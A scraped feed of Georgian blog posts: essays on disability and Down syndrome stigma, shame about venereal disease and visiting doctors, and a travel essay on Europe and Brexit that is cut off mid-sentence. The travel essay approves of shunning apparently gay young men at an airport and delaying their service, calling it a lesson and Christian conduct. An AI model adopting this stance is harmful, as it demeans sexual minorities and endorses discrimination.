სამწუხაროდ, არ ვიცი დღეს სად არის. ისევ ჩაკეტილ ოთახში ებრძვის დღეებს თუ ჯაჭვები დაამსხვრია და თამამად უყურებს ცას.

ჩვენშია პრობლემა!

პრობლემა სინდრომი კი არა, საზოგადოების დამოკიდებულებაა. დამოკიდებულება, რომელიც ხელს უშლის ინტეგრაციას ყოველ 3  წუთში, მსოფლიო მასშტაბით, დაუნის სინდრომის მქონე ერთი ბავშვი იბადება, ყოველი 800 ბავშვიდან კი ერთს დაუნის სინდრომი აქვს. საქართველოში ზუსტი სტატისტიკაც კი არ არსებობს.

რამდენიმე წლის წინ, ერთ-ერთი საინფორმაციო წყაროდან გავიგე, რომ თბილისში, შეზღუდული შესაძლებლობის მქონე ბავშვების სასწავლო და სარეაბილიტაციო დაწესებულების ეზოში შესასვლელი ერთ-ერთი მთავარი კარი მეზობლებმა დაადუღეს იმ მოტივით, რომ არ სურთ მათმა შვილებმა „ასეთ“ ბავშვებს უყურონ!

საქანელა, რომელიც ეტლით მოსარგებლე ბავშვებისთვის დამონტაჟდა დიდუბის სკვერში, აღარ არის. ის მოსახლეობამ ჩამოხსნა იმ მოტივით, რომ იმ სკვერში “ასეთი“ ბავშვები არ უნდა თამაშობდნენ.

ყველანი შეზღუდული შესაძლებლობების მქონე პირები ვართ!

მეც შშმპ ვარ!

დიახ, არსებობს ძალიან ბევრი სფერო, სადაც უუნარო ვარ. დიახ ჩემი შესაძლებლობები შეზღუდულია:

  • არ ვიცი ხატვა;
  • არ მეხერხება სიმღერა;
  • არ მეხერხება მუსიკალურ ინსტრუმენტებზე დაკვრა;
  • ......

ჩამონათვალი საკმაოდ დიდი გამოვა. ჩემი ჩამონათვალიც, შენი ჩამონათვალიც.

დიახ, შენ, ვინც ამას კითხულობ - შშმპ ხარ!

შენი მეზობელი დათოც შშმ პირია!

ჩვენი წინაპრებიც შშმ პირები იყვნენ!

 

SocietyLifestyleშშმპდაუნის სინდრომიკულტურასტიგმაპრობლემაგაეროკონვენცია

New Bicycle Track Opened around Lisi Lake

რაღაცეები იცვლება ..

$
0
0
Georgian

ჩემთვის რაღაცნაირად განსხავებული დროა სექტემბერი და როგორც მახსოვს ამ დროს ფოთოლცვენა იცის, მაგრამ ეს ადრე იყო, ახლა გარეთ მიწა ფოთოლზე მეტ ტყვიას იზიდავს, ეს ისე. მე კი თუთუნის კვამლში გახვეული ვზივარ და წყნარი „ჰანგების“ ფონზე ვფიქრობ, როგორ მოხდა ყველაფერი. „ზუსტად არ მახსოვს რა დღე იყო“, მაგრამ ორი რამ კარგად მახსოვს. პირველი, ერთი შეხედვით ჩვეულებრივი უწყინარი დღე იყო და მეორე მახსოვს, რომ ამ უწყინარ დღეს.........

CultureSocietyLifestyle

ექმთან ვიზიტის კომპლექსი თურმე კვლავ აქტუალურია

$
0
0
Georgian

რამდენიმე კვირის წინ მომიწია თბილისის ერთერთ კარგ, არასახელმწიფო კლინიკაში სტუმრობა, «ხალის» დიაგნოსტიკის გამო. როგორც საზოგადო პრობლემების კვლევით დაინტერესებული, ამ კლინიკის ერთერთ თანამშრომელთან, რომელიც ძალზედ კარგი მოსაუბრე გამოდგა, საუბარი გავაბი. ათასი რამ განვიხილეთ, ვიდრე ჩემი ანალიზების პასუხს ველოდებოდი და საუბრის ბოლოსკენ, მივადექით ვენეროლოგიის პრობლემას, რომელიც თურმე მეტად აქტუალურია სამედიცინო წრეებში და ამ თვალსაზრისით, ყველაზე პრობლემატური, ამ ტიპის დაავადებების მქონე ადამიანების მხრიდან, სამედიცინო დაწესებულებისადმი მიმართვიანობის პრობლემა ყოფილა.  რაციონალური ახსნა, ამ კლინიკის თანმშრომელმა იმისა თუ რატომ არ მიმართავენ ასეთი დაავადების მქონე ადამიანები ექიმს, ვერ მითხრა თუმცა, საუბარში ხშირად ახსენებდა სიტყვა «სირცხვილს». კლინიკიდან წამოსული დავფიქრდი იმაზე თუ რატომ დგას ეს პრობლემა და რამდენიმე პუბლიკაციაც გადავიკითხე თემატიკაზე, რომელიც ვენეროლგიის პრობლემებს ეხებოდა. ამ პუბლიკაციების მიხედვით ვენერული დაავადებები არა მხოლოდ ვიწრო სფეროთი პრობლემა, არამედ სოციალურად მნიშვნელოვანი და საკმაოდ მაღალი რისკის მატარებელი პრობლემა ყოფილა, რომელსაც უკავშირდება უშვილობა და თანდაყოლილი დეფექტები ახალშობილებში. ერთერთ მთავარ პრობლემათაგან კი ამ პუბლიკაციებშიც, მიუხედავად იმისა რომ არ იყო ქართული, ისევ და ისევ დაავედებულის სამედიცინო დაწესებულებისადმი მიმართვიანობის პრობლემა მუსირებდა და ამიტომაც იყო აყვანილი სიციალური პრობლემის რანგში. ჩვენს შემთხვევაშიც ამ პრობლემის განმაპირობებელი, როგორც ჩანს ის სოციალური კომპლექსია, რომელიც ჩვენში დღემდე პრობლემად რჩება და ეს კომპლექსი, სექსისადმი და მასთან დაკავშირებულ საკითხებისადმი დამოკიდებულებას გულისხმობს. 

 უცნაურია რომ ადამიანებს შეუძლიათ საკუთარი შთამომავლობა, თანდაყოლილი დეფექტების თვალსაზრისით რისკის ზონაში დატოვონ, იმის გამო რომ მათ სცხვენიათ ექიმთან მისვლა და სრულფასოვანი მკურნალობის ჩატარება, რომელის ფარგლებშიც «მენტალობისთვის» მიუღებელ თემებზე მოუწევს საუბარი. რატომღაც დარწმუნებული ვიყავი რომ ეს ეტაპი, ჩვენმა საზოგადოებამ გაიარა და ექმთან მისვლის კომპლექსი, ჩვენთვის ყველაზე «უხერხულ» საკითხებზეც კი, აღარ არსებობდა თუმცა, როგორც ჩანს გადამეტებული იყო ჩემი წარმოდგენა და რაც კიდევ უფრო გასაკვირი იყო, პირადად ჩემთვის ეს ისევ ძველი, «მიტყდებას» გამართლებით განპირობებული პრობლემაა.

მახსოვს 90-იანების ბოლოს, ერთ მეგობარი ხანგრძლივი პერიოდით დაგვეკარგა და აღარ ურთიერთობდა ჩვენთან, მოკითხვის შემდეგ გავარკვიეთ რომ ეს ჩვენს მეგობარი რაღაც უმნიშვნელო ვენეროლოგიური დაავადებით დაავადებულა და სწორედ ზემოთ ნახსენები «მიტყდებას» გამო, ვერ მივიდა ექიმთან, რის გამოც ჯერ ფსიქოლოგიური პრობლემები დაწყო და აქედან გამომდინარე მიხვდა ოჯახი რომ რაღაც კარგად ვერ ჰქონდა მათ ოჯახის წევრს. ანუ იმდენად სცხვენოდა ამ პრობლემის გამჟღავნების რომ საკუთარ ძმასაც კი ვერ უთხრა და რომ არა ფსიქოლოგიური სტრესი და მისით გამოწვეული შესამჩნევად შეცვლილი საქციელი, ეს ახალგაზრდა ბიჭი რა შედეგამდე მივიდოდა ღმერთმა უწყის. კლინიკის თანამშრომელთან საუბარმა ეს შემთხვევა გამახსენა და გამიღვიძა მაშინდელი გაოცება, რომელიც ჩვენი მეგობრის საქციელის გამო მქონდა. წარმოუდგენელია, დააყენო საკუთარი თავი ისეთი რისკის წინაშე, როგორიც არის უშვილობა ან შვილის თანდაყოლილი დეფექტები, ან კიდევ  სულაც რომ თავი დავანებოთ ზემოთნახსენებ რისკებს, საკუთარ ჯანმრთელობა მიაგდიო ასე, ბედის ანაბარად, მხოლოდ იმის გამო რომ არ შეგიძლია ექიმთან მისვლა. 

 ვენერული დაავადებების პრობლემატიკაში, ძალზედ დიდი მნიშვნელობა ენიჭება საზოგადოების ინფორმირებულობასა და ზოგად განვითარებულობას, რომელიც რა თქმა უნდა რომ გულისხმობს სექსუალურ აღზრდასა და ზოგადად, სექსუალურ ცხოვრებასთან დაკავშრებულ საკითხებს. ამ თვალსაზრისით რომ ჩამორჩენა გვაქვს ფაქტია და შესაბამისად, ზემოთ დასახული პრობლემაც, ლოგიკური ჩანს. 

 ჩვენს რეალობაში, არსებობს კიდევ ერთი ძალზედ გავრცელებული პრობლემა რომელიც თვითმკურნალობას ან ე.წ. «ხალხური მეთოდებით» მკურნალობას გულისხმობს, რომლის აღორძინებაც საქართველოში, საბჭოთა კავშირისი დაშლის შემდეგ მოხდა და რომელსაც, მაშინ ობიექტური მიზეზები ჰქონდა - მოშლილი სამედიცინო მომსახურებისა და კორუფციაში ჩაფლული სისტემი გამო, თუმცა მას შემდეგ საკმაო დრო გავიდა და წესით, ინფორმაციაც უფრო მეტი უნდა ჰქონდეს თანამდროვე ადამიანს, იმის შესახებ რომ ასეთი შორს მიმავალი შედეგების მქონე დაავადებების, სახლის პირობებში მკურნალობა, დაუშვებელია.  

 პრობლემა პრობლემად მაგრამ, რა რის ამ პრობლემის გადაჭრის გზა, ალბათ ჩემზე უკეთ მედიკოსებმა იციან, თუმცა ფაქტია ამ პრობლემის მოგვარებისთვის არ გაკეთებულა საკმარისი რომ ადამიანებში ეს «კომპლექსი» ქმედითი აღარ იყოს. ამისთვის შესაძლოა სამედიცინო დაწესებულებების პაციენტთა აღრიცხვის სისტემაში იყოს რაღაც შეცდომა, რომელიც პაციენტის კონფიდენციალობის მყარ გარანტიას ვერ იძლევა და ა.შ. თუმცა ძირითადად ისევ ჩვენში ფესვებგადმგმული სირცხვილი ყველაზე დიდი მიზეზია და როგროც ჩანს, ამ პრობლემის გადაჭრა საკმაოდი დიდი და ფართომაშტაბიანი სოციალური კამპანიები სჭირდება იმისთვის რომ თითოეულმა ადამიანმა, რომელიც ვენერული დაავადების თვალსაზრისით, დაინფიცირების მაღალი რისკის სოციალურ ჯგუფშია, მიიღოს ინფორმაცია - ჯერ ერთი, იმასთან დაკავშირებით რომ ვენერული დაავადებები საერთოდ არ არის პრობლემა, თუკი ექიმს დროულად მიმართავ და მეორე, რომ მიმართვა ექიმისადმი არის აუცილებელი და ძალზედ მნიშვნელოვანი, მცირედი ეჭვის შემთხვევაშიც კი.  

ამგვარი პრობლემის წინაში მხოლო ვერენოლოგია არ დგას და არსებობს კიდევ უმარავი სფერო, რომელშიც ჩვენი სიციალური კომპლექსები საკმაოდ დიდ როლს თამაშობენ და ამის გამო, ხშირად ვერ ვითარდება ჩვენი «საყოფაცხოვრებო მენტალობა». გამომდინარე იქიდან რომ ტრანსფორმაციებისთვის ძალა უბრალოდ არ შესწევს რადგან დაკავებულია არსებული, არქაულ პრობლემებთან და შეხედულებებთან გამკლავებით და მიმდინარე პრობლემებისთვის, უბრალოდ რესურსი აღარ ჰყოფნის. განსაკუთრებით მაშინ არის ასეთი ფენომენები საშიში, როდესაც საზოგადოების ძალიან დიდი ნაწილი ამ პრობლემაზე ლაპრაკსაც კი გაურბის! 

SocietyLifestyleვენეროლოგიაჯანმრთელობაექიმილისექსუალური ცხოვრება

კავშირი სამედიცინო მომსახურების ხარისხსა და ექიმისადმი მიმართვიანობას შორის

$
0
0
Georgian

ალბათ არ არის დარჩენილი ქვეყანაში ადამიანი, როემლსაც სამედიცინო მომსახურების პრობლემების შესახებ არ ემსჯელოს და ალბათ ძალიან ბევრია ისეთი, რომელიც თვლის რომ ქვეყანაში სამედიცინო მომსახურება ბევრად უარესია, ვიდრე შეიძლებოდა ყოფილიყო. სადაღაც ეს ადამიანები მართლები არიან თუმცა, ისიც უნდა ითქვას რომ ჩვენს რეგიონში, საქართველოს კლინიკები საუკეთესოებია და მათი მომსახურებით, მეზობელი ქვეყნების მოქალქეებიც ძალზედ ხშირად სარგებლობენ. რა თქმა უნდა, 90-აინი წლების კრიზისების ფონზე, რომელიც ქვეყანამ გადაიტანა, გარკვეულწილად ბუნებრივიცაა რომ ჩამორჩენა გვაქვს, ასეთ მნიშვნელოვან სფეროში როგორიც მედიცინაა თუმცა, ამ ჩამორჩენას გარკვეული ობიექტური მიზეზები უდევს  საფუძვლად და ეს მიზეზები ძირითადად კავშირშია, ქვეყნის მოსახლეობის ეკონომიკურ შესაძლებლობებთან, სამედიცინო განათლების სისტემასა და თავად პაციენტების ქცევასთან. 

ცალკეული ამ პუნქტების მიხედვით განხილვას არ მოვყვებით რადგან, ამ სტატიის მიზანია დაანახოს ადამიანებს, ექიმთან მიმართვიანობის აუცილებლობის პრობლემა და წამოსწიოს საზოგადიებაში, ამ საკითხთან დაკავშირებული თემატიკა.  

მაგალითისთვის, ნებისმერ ჩვენთაგანს შეუძლია გაიხსენოს არაერთი ფაქტი, როდესაც ადამიანები ამჯობინებენ ე.წ. «ხალხური მეთოდებით» სახლში თვითმკურნალობას მაშინაც კი როდესაც, სიმპტომები ე.წ. ჩვეულებრივი გაციების ან სხვა, ასე ვთქვათ წვრილმანი დაავადებისთვის დამახასიათებელი არ არის და შესაბამისად, არც ის რისკია ცნობილი, თუ რა შედეგებით შეიძლება დასრულდეს ის დაავადებულისთვის. მიუხედავად ასეთი გაურკვევლობებისა, ადამიანები ამჯობინებენ ზემოხსენებული მეთოდებით მკურნალობას და რატომღაც, ექიმთან ვიზიტს ერიდებიან. რა თქმა უნდა რომ ხშირად ამის მიზეზი არის მოუცლელობა, რომელიც განპირობებულია სამედიცინო მომსახურების მიღებისთვის აუცილებელი, ადმინისტრაციული პროცედურებით, ეკონომიკური ფაქტორებით და ა.შ. თუმცა ამ მიზეზების გარდა, არის კიდევ ერთი ძალზედ უცნაური ფენომენი, რომელიც თავს იჩენს ძირითადად ვენერული დაავადების მქიონე პაციენტებში. როგორც მედიკოსები ამბობენ, ვენერული დაავადების მქონე პაციენტთა მხრიდან, ექმისადმი მიმართვის ძალიან დაბალი პროცენტია და ამას ძირითადად ხსნიან სირცხვილით, რომლის გამოც ადამიანები რისკავენ ძალიან ბევრით და მიუხედავად ამ რისკისა, ან არასრულად იტარებენ მკურნალობის კურსს, ან საკუთარი ძალებითა და სხვათა გამოცდილების გაზიარებით ცდილობენ, თვითმკურნალობას ასევე სახლში პირობებში, ექიმის დანიშნულების გარეშე. რა თქმა უნდა ასეთი მიდგომა ძალზედ სარისკოა იქიდან გამომდიანრე რომ ვენერული დაავადებები, პირდაპირ ახდენს გავლენას რეპროდუქციულ ჯანმრთელობაზე და ხშირად, არასრულყოფილი მკურნალობა ან თვითმკურნალობის მეთოდის გამოყენება, შესაძლოა გახდეს უშვილობის ან შვილის, თანდაყოლილი დეფექტების მიზეზი. ძნელი წარმოსადგენია დღევანდელ ინფორმაციულ სამყაროში, ვინმე ინფორმაციის ნაკლებობას უჩიოდეს და არ იცოდეს ის თუ რა რისკის წინაშე აყენებს საკუთარ თავსაც და შთამომავლობასაც მაგრამ, როგორც ჩანს ეს სირცხვილი, იმდენად ძლიერია რომ ასეთი რისკით არსებობა უფრო კომფორტული ეჩვენება ინფიცრებულს. გამომდინარე პრობლემის ასეთი შინაარსიდან, ვითარების შესაცვლელად საჭიროა მაშტაბური საინფორმაციო კამპანიის წარმოება. აუცილებელია მოხდეს, ადამიანების ინფორმირება რისკების შესახებ. ასევე მოხდეს ისეთი მომსახურების სტანდარტის შექმნა სამკურნალო დაწესებულებებში, რომელიც გარანტირებულად უზრუნველყოფს პაციენტის კონფიდენციალურობას და გაცილებით უკეთესი იქნება, თუკი კონფიდენციალობის განცდა, გამტკიცებული იქნება სამედიცინო დაწესებულებაში უშუალო ვიზიტისას.

ამასთანავე, ბევრისთვის შესაძლოა სიახლე იყოს მაგრამ პაციენტების მიმართვიანობასთან, პიდაპირ კავშირშია სამედიცინო მომსახურების და ასევე ზოგადად, ამათუიმ სამედიცონო დარგის, განვითარების ხარისხიც. ამ შემთხვევაში ძალზედ მარტივი ლოგიკა მუშაობს - რაც უფრო მეტი პრაქტიკა აქვთ ექიმებს, მით უფრო განვითარებულია ის კონკრეტული სამედიცინო სფეროც, ხოლო იმისთვის რომ პრაქტიკა ჰქონდეთ მედ.პერსონალს, საჭიროა პაციენტების მიმართვა, მათი კვლევა და ამ კვლევის შედეგებზე, სტატისტიკის წარმოება, სოციალური ფაქტორების რეგისტრირება, გათვალისწინება (თუკი გადამდებ დაავადებებს ეხება) და რისკის ზონების გამოყოფა საყოფაცხოვრებო გარემოში, რომელიც საბოლოო ჯამში აყალიბებს მკურნალობის ტექნოლოგიას და ქმნის პრაქტიკას, კონკრეტულ გეოგრაფიულ და სოციალურ პირობებში, ამათუიმ დაავადების გავრცელების, მისი დიაგნოსტირების, პრევენციული ზომებისა და მკურანელობის შესახებ. 

გამომდინარე იქიდან რომ ნიმუშად ვენეროლოგია ავიღეთ, ისევ ამ დარგის მაგალითზე შეიძლება ითქვას რომ ზემოთ აღწერილი «კომპლექსის» გამო, ქვეყანაში არსებულ სამედიცინო სწავლების სისტემაში, გამოყენებულია ვენეროლოგიურ დაავადებათა მკურანალობის მეთოდი, რომელიც შემუშავებულია გასული საუკუნის 30-იან წლებში და მას შემდეგ, ტრანსფორმაცია არ განუცდია. თუმცა, მიუხედავად ამისა, დასავლეთში განათლება და პრაქტიკა მიღებული ექიმების წყალობით, ასევე კერძო კლინიკების გაჩენით, მკურნალობის და დიაგნოსტირების სრიულიად თანამედროვე მეთოდებია შემოტანილია ქვეყანაში. სტატისტიკის მიხედვით, ბოლო 10 წლის განმავლობაში ვენერულ დაავადებათა შემთხვევების აღწერამ იმატა და ამის გამო, სტატისტიკაც მზარდობის ტენდენციით ხასიათდება. რაც ერთის მხრივ კარგი მაჩვენებელია, იმ თვალსაზრისით რომ ის ასევე მიანიშნებს მიმართვიანობის მზარდობაზე და მეორეს მხრივ მიანიშნებს პაციენტთა მზარდ პროცენტზე, რომელთაც სძლიეს «კომპლექსს», რაც კარგი წინაპირობაა იმისთვის რომ გაჩნდეს იმედი, ამ ერთი კონკრეტული სამედიცინო დარგის განვითარების თვალსაზრისით. 

 ისევე როგორც ყველა სფერო, სამედიცინო სფეროც საჭიროებს ერთგვარ დახმარებას ზემოთ აღწერილი თვალსაზრისით და ეს დახმარება, ორივე მხარისთვის სასრგებლოა რადგან, ერთი მხარე იძენს გამოცდილებას, მეორე კი ჯანმრთელობას და მოგებული ამ ურთიერთობისგან, რჩებიან ჩვენი შთამომავლები, რომლებიც უფრო ჯანსაღ გარემოში და განვითარებული მედიცინის პრობებში იარსებებენ.   

SocietySci-TechLifestyleვენეროლოგიავიზიტი ექიმთანკერძო კლინიკასამედიცინო განათლება

"გრეგზიტი", "ბრეგზიტი"და საქართველოს ევროინტეგრაცია, ნაწილი II

$
0
0
Georgian

   ამ ზაფხულს ევროპაში მოგზაურობამ სულ სხვა, ახალი რაკურსით დამანახა ჩვენი ევროკავშირისკენ სწრაფვის გარდაუვალობა და ამ კუთხით დღევანდელი მდგომარეობა, ანუ სად ვართ ამ გზაზე! ეს მოგზაურობა გამორჩეული იყო იმით, რომ მეტი დრო მქონდა, ავტომობილით სამგზავროდ და ბენელუქსის ქვეყნები სოფლის შარაგზებით მოვიარე და არა ტრასებით, მადლობა უფალს, რომ ამის საშუალება მომეცა. ალბათ ეს არის ის, რაც უნდა გააკეთო, თუ გინდა რომ რეალურად გაეცნო ქვეყნის ან რეგიონის კულტურას და დაინახო მისი რეალური სახე. პირველი, რაც თვალში მომხვდა, ეს იყო უღრანი ტყეები, რომლებზეც გადის ეს გზები, სოფლები და ქალაქებიც კი! ხეების რაოდენობის მიხედვით თუ ვიმსჯელებთ შეიძლება ითქვას, რომ ევროპა ჩაფლულია უღრან ტყეში, მაგრამ არა გადატანითი მნიშვნელობით, რასაც ჩვენს შემთხვევაში ვერ იტყვი. ალბათ სწორედ ამის ბრალია, რომ ევროპაში უფრო ადვილია სუნთქვა, ვიდრე ჩვენთან, პირდაპირი და გადატანითი მნიშვნელობითაც.

   დღეს ევროპის ეკონომიკა ძალიან განვითარებულია და ეს არავისთვის არ წარმოადგენს საიდუმლოს. მიუხედავად ამისა, ქალაქების ქუჩებში და გზებზე არ გხვდება საცობები, ადამიანები გადაადგილდებიან ძირითადად ველოსიპედებით. ცხადია მანქანებითაც გადაადგილდებიან, მაგრამ უფრო შორ დისტანციებზე, თუმცა მიუხედავად ამისა ვერც ტრასებზე და გზებზე შეხვდები საცობებს, დაძაბულობას და ავარიულ თუ სახიფათო მდგომარეობას, ყოველ შემთხვევაში მე ასეთი არ შემხვედრია. მძღოლებიც და მგზავრებიც მშვიდად და წესების დაცვით მოძრაობენ. ალბათ ეს არის მიზეზი იმისა, რომ არ არის არც გზები, არც ტრასები და არც ქალაქის ქუჩები ავტომობილებით გადატვირთული, არავინ არღვევს ღერძულა ხაზს, არჩეულ მწკრივში მშვიდად და აუღელვებლად მოძრაობს ყველა. ასევე, ყველა ემორჩილება პარკინგის წესებს და მანქანას არ აჩერებენ იქ, სადაც არ არის ავტოსადგომი ან დაშვებულია პარკინგი. მაინცდამაინც არც ქალაქის ცენტრში ეტანებიან ავტომობილებით მოძრაობას, რადგან საცობების შექმნას უფრთხიან, ამჯობინებენ მანქანა დატოვონ ცენტრიდან მოშორებით, სადაც ამის შესაძლებლობა არის და ფეხით გადაადგილდნენ ხალხმრავალ ადგილებში. არსებობს პარკინგის მკაცრად დადგენილი წესები და მათ განურჩევლად სქესისა, ეთნიკური წარმოშობისა, ასაკისა თუ სოციალური მდგომარეობისა, ყველა გაგებით ეკიდება.

   მილანიდან ამსტერდამისკენ გამგზავრებისას აეროპორტში ერთ უცნაურ სცენას შევესწარი. თვითმფრინავში ჩასხდომის ბოლო ეტაპზე, ანუ პასპორტის კონტროლის რიგში, რომელიც ორად იყოფოდა, ერთ მხარეს იდგნენ უცნაურად ჩაცმული ახალგაზრდა, საკმაოდ ხმაურიანი მამაკაცები და მათ გარდა არავინ დგებოდა იმ რიგში, მეორე მხარეს კი უამრავი ხალხი გამწკრივებულიყო და მოთმინებით ელოდა ჩასხდომის ბარათს. რატომღაც მეც იმ გრძელ რიგში დავდექი და მხოლოდ შემდეგ გავაცნობიერე რაც ხდებოდა. მოკლე რიგში იდგნენ ახალგაზრდები სექსუალური უმცირესობიდან. ერთ-ერთ მათგანს გრძელი კაბა ეცვა, მხრებზე გრძელი დალალები ჩამოშლოდა, თუმცა წვერი კი კარგა ხნის გაუპარსავი მოუჩანდა ამ კოხტა კულულებიდან. ახალგაზრდა მამაკაცები მხიარულად გამოიყურებოდნენ და ხმამაღლა იცინოდნენ, თუმცა დანარჩენი საზოგადოება საკმაოდ დაზაფრული შესცქეროდა, უფრო მეტიც, ზოგიერთი არც ცინიკურ ღიმილს ერიდებოდა. ერთი იტალიელი ქალბატონი, რომელიც ქმარ-შვილის თანხლებით მოშორებით იდგა, არც კომენტარებს და აშკარა გამკიცხველ მზერას იშურებდა მათი მისამართით. გამეღიმა, თავშეკავებული და ტოლერანტულად განწყობილი ევროპელების იმიჯს უეცრად ჩრდილი მიადგა, ეს სცენა ამ გარემოცვაში უჩვეულოდ მომეჩვენა. დავფიქრდი, თუმცა რა არის ახალი ამაში, ხომ ვიცოდი, რომ ოჯახი, რწმენა, სულიერება, ტრადიციები მუდამ წარმოადგენდა ევროპელისთვის მარადიულ ფასეულობებს და არც ახლა შეცვლილა არაფერი. გამახსენდა ევროპის სხვადასხვა დიდ ქალაქებში გამართული მრავალრიცხოვნი, ხმაურიანი, თუმცა მშვიდობიანი აქციები ერთსქესიანთა ქორწინების წინააღმდეგ . ეს ის ტრადიციული, ევროპული საზოგადოებაა, რომელიც შესამჩნევად უფრო ტოლერანტული და დემოკრატიული გახდა ბოლო საუკუნეების მანძილზე, ვიდრე ადრეულ ხანაში. დღეს ისინი წინააღმდეგი არიან ნებისმიერი სახის ძალადობის, მათ შორის ნებისმიერი უმცირესობის მიმართ, თუმცა ჩვეულ ფასეულობებს ვერ ღალატობენ და ასეც უნდა იყოს. დედა, რომელიც მის ვაჟთან და მეუღლესთან ერთად იყო, ღიად აფიქსირებდა მათთან მის დამოკიდებულებას მსგავსი ქცევის მიმართ. მართლაც აშკარად მიუღებელი იყო იქ მდგომი საზოგადოებისთვის ეტიკეტის ასეთი უხეში დარღვევა და ისინი ამგვარად გამოხატავდნენ თავიანთ მშვიდ, მაგრამ მაინც აშკარა პროტესტს, არ დგებოდნენ რიგში მათთან ერთად, გარიყეს! ყველაზე საინტერესო კი ის იყო, რომ ჩვენი გრძელი რიგი სწრაფად გადიოდა, მათთან კი მომსახურე პერსონალმა დატოვა პოსტი და კარგა ხნით გაუჩინარდა. ეს გაუჩინარება იმდენად დიდ ხანს გაგრძელდა და იმდენად თვალშისაცემი იყო, რომ ეჭვიც კი გამიჩნდა, რომ უარს ამბობდნენ მათ მომსახურებაზე. დაძაბულობა შეეტყოთ ამ უცნაურად ჩაცმულ ახალგაზრდებსაც. გრძელკულულებიანმა და გრძელკაბიანმა ვაჟმა პარიკი მოიხსნა და ახლა უპარიკოდ იდგა და მოთმინებით ელოდა რიგის დაძვრას. კარგა ხნის შემდეგ, როგორც იქნა გამოჩნდა აეროპორტის თანამშრომელი და მათი რიგიც დაიძრა. მცირეოდენი შეყოვნების, საბუთების საფუძვლიანი გადამოწმებისა და ხანგრძლივი გასაუბრების შემდეგ მათ თვითმფრინავში ასვლის ნება დართეს, თუმცა ეს "გამორჩეული"ჯგუფი აღარც ისეთი მხიარული ჩანდა, როგორც ჩანს "ჭკუა ასწავლეს". ცხადია, თვითმფრინავში მათთვის არავის არაფერი უგრძნობინებია და აღარც თავად იქცეოდნენ გამომწვევად. მთავარი ევროპული საზოგადოების ქცევაში იყო ის, რომ მათ მოახერხეს ძალადობის და შეურაცხყოფის გარეშე ხაზი გაესვათ იმისთვის, თუ რა არის მათთვის მისაღები და რა არის მიუღებელი. ეს ჭეშმარიტად ქრისტიანული საქციელი იყო, ტოლერანტული, მაგრამ პრინციპული.

   ევროპა სამწუხაროდ აღარ წარმოადგენს უსაფრთხო ადგილს, დღეს იქ არსებობს ტერორიზმის საფრთხე და ეს ყველამ კარგად იცის. მიუხედავად იმისა, რომ მათ უმადურობით და სისასტიკით უპასუხეს სიკეთეზე და კაცთმოყვარეობაზე ემიგრანტების ნაწილმა, რომლებიც გულთბილად მიიღეს და ყველაფერი გაუზიარეს, ვერ შეხვდებით დაძაბულ სიტუაციებს ან უპატივცემლო და ნეგატიურ დამოკიდებულებას ეთნიკურად არაევროპელი მოსახლეობის მიმართ. მიუხედავად ყველაფრისა, ისინი სრულიად თავისუფლად და დაცულად გრძნობენ თავს ევროპაში. უფრო მეტიც, მათი ღირსება დაცულია და მათ პატივისცემით ეპყრობიან, როგორც ეს ევროპელებს სჩვევიათ. მათ შესანიშნავად ესმით მდგომარეობის პარადოქსულობა, მაგრამ თავიანთი ქცევის კულტურას, თავშეკავებულობას და თავაზიანობას ვერ ღალატობენ, ამას ვერაფერი შეარყევს. ეს არის ალბათ ის მთავარი, რაც მათ ბევრი სხვისგან განასხვავებს - თავაზიანობა და კეთილგანწყობა! ეს სწორედ ის არის, რაც კულტურულ ადამიანს ბრბოსგან გამოარჩევს და რის გამოც მიყვარს ევროპა და ევროპელები, თუმცა, ცხადია არა მხოლოდ ამის გამო. ევროპელი შრომისმოყვარე და წერიგის მოყვარულია, ის კანონმორჩილია, ლმობიერი, სამართლიანი და მიმტევებელია, ზოგადსაკაცობრიო პრინციპების, მარადიული ღირებულებების და ტრადიციული ფასეულობების დამცველია, ერთი სიტყვით, ის კარგი ქრისტიანია. ამას ნიშნავს დღეს ჩემთვის ევროპელობა და არა იმ მცდარ შეხედულებებს, რაც ჩვენი საზოგადოების ნაწილს დღეს ევროპულ მოვლენად მიაჩნია. 

   დღეს მსოფლიოში აქტუალური თემაა "ბრეგზიტი" და მითუმეტეს ევროპელები ბევრს საუბრობენ მის შესახებ. ტელევიზიით გადმოსცემდნენ დისკუსიებს და თოქ-შოუებს ამ საკითხთან დაკავშირებით. როგორც გაირკვა, "ბრეგზიტი"-ს გამომწვევი მიზეზები არა მხოლოდ ეკონომიკურ ხასიათს ატარებდა. ბრიტანეთი აშკარად უკმაყოფილოა ევროკავშირის ლოიალური პოლიტიკით ლტოლვილების მიმართ. ისინი თვლიან, რომ  "ბრეგზიტი"-თ, ანუ ევროკავშირიდან გასვლით მათ დამოუკიდებლობა ხელახლა მოიპოვეს, უფრო მეტიც, ისინი ზეიმობდნენ დამოუკიდებლობის დაბრუნებას!კულუარებში ახლა უკვე აქტიურად საუბრობენ საფრანგეთის მზადყოფნაზე გაიმეოროს ბრიტანეთის გზა და არა მხოლოდ საფრანგეთი, შესაძლოა შემდეგ ავსტრიამ და ნიდერლანდებმაც გამოხატონ თავიანთი უკმაყოფილება მსგავსი "ეგზიტები"-ს სახით, რაც ევროკავშირს პრინციპში დაასუსტებს. ჩვენ ცხადია ეს არანაირად არ გვაწყობს, უფრო მეტიც, ეს ჩვენს სტატუსს, მითუფრო ჩვენი ეკონომიური მდგომარეობის გათვალისწინებით, კიდევ უფრო საეჭვოს ხდის ევროინტეგრაციის პროცესში. სამწუხარო რეალობაა, მაგრამ უმჯობესია არსებული სურათი იცოდე, ვიდრე ეიფორიაში იყო და წარმოდგენა არ გქონდეს რას გიქადნის მომავალი. მომავალი კი ჩვენ ბევრ შრომას და ბევრის გამოსწორებას გვთავაზობს, თუკი გვინდა, რომ ევროპის გზას მივყვეთ. დამოუკიდებლობა და თავისუფლება საკუთარი სიძლიერის ხარჯზე მოდის და არამც და არამც სხვის ხარჯზე! ევროპის მოკავშირეობა ჩვენთვის სასიცოცხლოდ მნიშვნელოვანი და აუცილებელია, თუმცა ნატოში გაწევრიანებისა არ იყოს, ევროპაში ინტეგრაციაც ჩვენი ეკონომიკური სტატუსის და ინსტიტუტების გაძლიერება-გაუმჯობესების გავლით მოხდება და სავარაუდოდ ხვალ-ზეგ ვერ მოხერხდება. დღეს სახელმწიფოები ფასდებიან მათი ეკონომიკური სიძლიერით და დემოკრატიული ფასეულობებით. ვშიშობ, რომ ჩვენ ამ კუთხით კიდევ ბევრი გვაქვს გასაკეთებელი. თუმცა, იმედით ცოცხლობს ადამიანი და იმედი არ მოგვიშალოს ღმერთმა, ვინც ზუსტად იცის რის მიღწევა სურს, ის 